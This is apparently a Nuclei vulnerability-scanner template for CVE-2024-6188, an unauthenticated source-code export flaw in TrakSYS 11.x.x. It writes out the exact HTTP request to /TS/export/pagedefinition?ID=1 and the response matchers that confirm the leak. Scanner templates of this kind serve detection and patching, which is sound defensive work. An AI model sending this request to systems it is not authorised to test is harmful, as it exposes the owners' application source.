id: CVE-2024-6188 info: name: TrakSYS 11.x.x - Sensitive Data Exposure author: securityforeveryone severity: medium description: | A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. impact: An attacker is able to export the source code of the pages without having any credentials to access the application. reference: - https://kiwiyumi.com/post/tracksys-export-source-code/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6188 - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188 - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188 metadata: verified: true max-request: 1 vendor: parsec-automation product: tracksys tags: cve,cve2024,traksys,idor,info-leak http: - raw: - | GET /TS/export/pagedefinition?ID=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'TrakSYS Version' - 'Name' - 'Altname' condition: and - type: word part: content_type words: - 'text/plain' - type: status status: - 200